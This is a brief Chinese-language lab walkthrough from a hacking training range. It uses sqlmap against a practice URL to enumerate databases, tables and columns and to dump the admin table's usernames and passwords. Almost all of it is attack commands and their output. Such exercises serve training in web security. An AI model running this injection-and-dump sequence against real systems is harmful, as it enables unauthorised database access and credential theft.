https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7
sqlmap.py -u http://59.63.200.79:8003/?id=1
sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
available databases [3]: [] information_schema [] maoshe [*] test 初步判断是maoshe
sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe --tables
Database: maoshe [4 tables] ±------+ | admin | | dirs | | news | | xss | ±------+
查找admin表下面的列 sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --column 找到三个字段 Database: maoshe Table: admin [3 columns] ±---------±------------+ | Column | Type | ±---------±------------+ | Id | int(11) | | password | varchar(11) | | username | varchar(11) | ±---------±------------+ 我们只需要账号密码字段就行了 查找账号密码
sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
Database: maoshe Table: admin [2 entries] ±---------±-----------+ | username | password | ±---------±-----------+ | admin | hellohack | | ppt领取微信 | zkaqbanban | ±---------±-----------+
本次注入完成